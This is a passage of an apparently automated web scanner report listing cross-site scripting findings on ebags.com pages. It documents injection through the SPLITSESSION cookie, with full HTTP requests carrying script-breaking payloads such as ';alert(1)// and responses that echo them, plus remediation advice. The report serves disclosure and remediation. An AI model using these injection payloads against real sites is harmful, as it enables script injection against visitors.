Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:03:13 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 36866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<script language="javascript">
function redir(site)
{
window.opener.location.href = site;
window.close()
}
function
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|feaa6';alert(1)//78f8edd5719');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.26. http://www.ebags.com/blocks/dsp_prop65.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /blocks/dsp_prop65.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f39a'%3balert(1)//5bb97bc106 was submitted in the SPLITSESSION cookie. This input was echoed as 5f39a';alert(1)//5bb97bc106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blocks/dsp_prop65.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C5f39a'%3balert(1)//5bb97bc106; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:53 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:53 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 5476


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<script language="javascript">
function redir(site)
{
window.opener.location.href = site;
window.close()
}
function
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822PRODUCTID=');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|5f39a';alert(1)//5bb97bc106');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.27. http://www.ebags.com/brand/athalon [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/athalon

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2404'%3balert(1)//cf7d16e2d7 was submitted in the SPLITSESSION cookie. This input was echoed as c2404';alert(1)//cf7d16e2d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/athalon HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cc2404'%3balert(1)//cf7d16e2d7; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:17 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:17 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 75088


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|c2404';alert(1)//cf7d16e2d7');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.28. http://www.ebags.com/brand/bosca [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/bosca

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71225'%3balert(1)//a44107e12fc was submitted in the SPLITSESSION cookie. This input was echoed as 71225';alert(1)//a44107e12fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/bosca HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C71225'%3balert(1)//a44107e12fc; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:39 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:39 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 116689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|71225';alert(1)//a44107e12fc');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.29. http://www.ebags.com/brand/burton [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/burton

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97424'%3balert(1)//258024c82f9 was submitted in the SPLITSESSION cookie. This input was echoed as 97424';alert(1)//258024c82f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/burton HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C97424'%3balert(1)//258024c82f9; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:29 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:29 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|97424';alert(1)//258024c82f9');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.30. http://www.ebags.com/brand/eagle-creek [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/eagle-creek

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecec4'%3balert(1)//f2ada83a4d7 was submitted in the SPLITSESSION cookie. This input was echoed as ecec4';alert(1)//f2ada83a4d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/eagle-creek HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cecec4'%3balert(1)//f2ada83a4d7; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:23 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:23 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 123022


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|ecec4';alert(1)//f2ada83a4d7');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.31. http://www.ebags.com/brand/fleurville [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/fleurville

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e561'%3balert(1)//17f2a82fd26 was submitted in the SPLITSESSION cookie. This input was echoed as 9e561';alert(1)//17f2a82fd26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/fleurville HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C9e561'%3balert(1)//17f2a82fd26; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:59 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:59 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 62472


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|9e561';alert(1)//17f2a82fd26');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.32. http://www.ebags.com/brand/hobo-international [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/hobo-international

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8276a'%3balert(1)//ef97d0119db was submitted in the SPLITSESSION cookie. This input was echoed as 8276a';alert(1)//ef97d0119db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/hobo-international HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C8276a'%3balert(1)//ef97d0119db; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:32 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:32 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 52236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|8276a';alert(1)//ef97d0119db');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.33. http://www.ebags.com/brand/hurley [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/hurley

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e6d1'%3balert(1)//2c88207f059 was submitted in the SPLITSESSION cookie. This input was echoed as 3e6d1';alert(1)//2c88207f059 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/hurley HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C3e6d1'%3balert(1)//2c88207f059; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:09 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:09 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 83680


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|3e6d1';alert(1)//2c88207f059');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.34. http://www.ebags.com/brand/ju-ju-be [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/ju-ju-be

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93998'%3balert(1)//c9644ddb34a was submitted in the SPLITSESSION cookie. This input was echoed as 93998';alert(1)//c9644ddb34a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/ju-ju-be HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C93998'%3balert(1)//c9644ddb34a; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:08 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:08 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 68478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|93998';alert(1)//c9644ddb34a');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.35. http://www.ebags.com/brand/kalencom [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/kalencom

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77446'%3balert(1)//b3a84a8c4d6 was submitted in the SPLITSESSION cookie. This input was echoed as 77446';alert(1)//b3a84a8c4d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

